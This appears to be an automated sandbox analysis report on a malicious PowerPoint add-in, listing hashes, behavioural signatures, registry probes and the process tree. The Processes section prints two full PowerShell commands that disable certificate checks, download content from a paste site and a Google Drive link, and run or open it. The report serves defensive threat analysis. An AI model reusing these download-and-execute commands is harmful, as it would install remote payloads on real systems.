Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
21-05-2024 14:04
Static task
static1
Behavioral task
behavioral1
Sample
516a68bcd0ba36727964cf175ab4bc3f2dad9a8cf6c923eb29d41ea5b8c621a4.ppam
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
516a68bcd0ba36727964cf175ab4bc3f2dad9a8cf6c923eb29d41ea5b8c621a4.ppam
Resource
win10v2004-20240508-en
General
-
Target
516a68bcd0ba36727964cf175ab4bc3f2dad9a8cf6c923eb29d41ea5b8c621a4.ppam
-
Size
15KB
-
MD5
2f5518eab74b27def099fa3fadb06b5d
-
SHA1
3676f4c0457e6bbf3f343a7222937995ba4c3518
-
SHA256
516a68bcd0ba36727964cf175ab4bc3f2dad9a8cf6c923eb29d41ea5b8c621a4
-
SHA512
07bbad84bc499dcb36210260ea3536b064cec1a08d92d90eae06f98f399d7710b248f48085a4017fd44f2ba7b4cee5f973e327719ba69d1af06afbc16d3b53b4
-
SSDEEP
384:dXPEeBSzKuCjIOIxvTNRX/GC+p/RU3Af7CRRWiwJM:VPEeByCje3RX/spZU3ADCfWip
Malware Config
Extracted
https://pt.textbin.net/download/x7sf6t2dgv
Extracted
https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2312 3668 powershell.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1912 3668 powershell.exe POWERPNT.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exeflow pid process 20 1912 powershell.exe 21 2312 powershell.exe 26 1912 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Processes:
powershell.exepowershell.exepid process 1912 powershell.exe 2312 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 3668 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2312 powershell.exe 1912 powershell.exe 2312 powershell.exe 1912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 1912 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
POWERPNT.EXEpid process 3668 POWERPNT.EXE 3668 POWERPNT.EXE 3668 POWERPNT.EXE 3668 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
POWERPNT.EXEpowershell.exepowershell.exedescription pid process target process PID 3668 wrote to memory of 2312 3668 POWERPNT.EXE powershell.exe PID 3668 wrote to memory of 2312 3668 POWERPNT.EXE powershell.exe PID 3668 wrote to memory of 1912 3668 POWERPNT.EXE powershell.exe PID 3668 wrote to memory of 1912 3668 POWERPNT.EXE powershell.exe PID 1912 wrote to memory of 4264 1912 powershell.exe POWERPNT.EXE PID 1912 wrote to memory of 4264 1912 powershell.exe POWERPNT.EXE PID 1912 wrote to memory of 4264 1912 powershell.exe POWERPNT.EXE PID 2312 wrote to memory of 3588 2312 powershell.exe wscript.exe PID 2312 wrote to memory of 3588 2312 powershell.exe wscript.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\516a68bcd0ba36727964cf175ab4bc3f2dad9a8cf6c923eb29d41ea5b8c621a4.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$UmniN;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/x7sf6t2dgv' ) ;$UmniN = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$UmniN | Out-File -FilePath 'x.js' -force ;wscript.exe x.js ; exit2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" x.js3⤵PID:3588
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$UmniN;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\x.pptx" /ou ""3⤵PID:4264
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5c14cfe9cceee0b2fa2f4d0638215f4b7
SHA15895dd3fcff705cd16caba80ecc28edb67591fe0
SHA2569a6678bda60018ea04abbd3a5569f2349a4e9a1d533d150e030197330a5ec02b
SHA512c9b31f7914e4ee36306aed9625188c45e820e94ccd542a63a0ce73f19989eaa699e407a74db0c66fe7b6492b9564cd7d0c078ff044be20ea5f700a864577428c
-
Filesize
89B
MD5b1cecd53ef28c1c0b028b61ce05f58ad
SHA1e584c6401a8bf88bba7fd66d6f7566e68457e985
SHA256640312905782ec6cb158bcdd84d6f1d461dcfbe148774f1acf7ae107e4027d01
SHA5128be92c74fa2b3149a65a12c8ee16da3072b01b88855188e2b15bde66c632f3994caa1762a7fea6351b28e08bf73f22e44dbf357b10af18b49057941fe26f396d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
1.0MB
MD511a39284007e332f4fde1320f61c5a9d
SHA1f88a82670fa93b703a7b51d624e810b0049078cd
SHA256c516759eb48802300a45ea6295b670656917368bd93d1711bf6406b8997062c9
SHA512ec1b7ed28dc111b519e994736d16e2e73f43aa292ba72c85464d8dfd5cfd60d0f501c3c0feb4f109257def6e5cce96c3fbb8de060907d91e4fa050e2f5c38155